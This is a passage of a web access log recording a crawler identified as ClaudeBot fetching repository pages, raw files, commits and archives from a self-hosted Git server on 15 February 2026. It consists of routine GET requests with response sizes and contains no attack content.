"/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 216.73.216.188] [Length 10993] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity%2Fhalfweekly" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 216.73.216.188] [Length 7501] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 9827] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/index.html" [Client 216.73.216.188] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/archive/3181052619700dceeeef81a9a0851130498f177e.zip" [Client 216.73.216.188] [Length 61374] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10861] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/18fa480c84b358da8bf50d54057f53591759225f.zip" [Client 216.73.216.188] [Length 250684] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14677] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=.gitignore" [Client 216.73.216.188] [Length 21481] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity%2Fmonthly" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fimport_csv.py" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/status.json" [Client 216.73.216.188] [Length 9783] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/status.json" [Client 216.73.216.188] [Length 814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 24368] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 216.73.216.188] [Length 20876] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 216.73.216.188] [Length 9838] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 9911] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 216.73.216.188] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 216.73.216.188] [Length 15296] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2Fprojects.sln" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 11489] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json?display=rendered" [Client 216.73.216.188] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images" [Client 216.73.216.188] [Length 10173] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 216.73.216.188] [Length 10794] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/vite.config.ts?display=rendered" [Client 216.73.216.188] [Length 11088] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?state=open" [Client 216.73.216.188] [Length 8471] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 216.73.216.188] [Length 9859] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 216.73.216.188] [Length 10420] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 216.73.216.188] [Length 10992] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2F.vscode%2Flaunch.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 216.73.216.188] [Length 16082] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 216.73.216.188] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 216.73.216.188] [Length 10294] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 216.73.216.188] [Length 9852] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 216.73.216.188] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11444] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=rendered" [Client 216.73.216.188] [Length 11010] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity%2Frecent-commits" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=update_status.py" [Client 216.73.216.188] [Length 24925] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/a0a212e41c7ebc2699ea736d71d145b9844673ec.bundle" [Client 216.73.216.188] [Length 12886675] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 216.73.216.188] [Length 10992] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 216.73.216.188] [Length 10975] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 9823] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 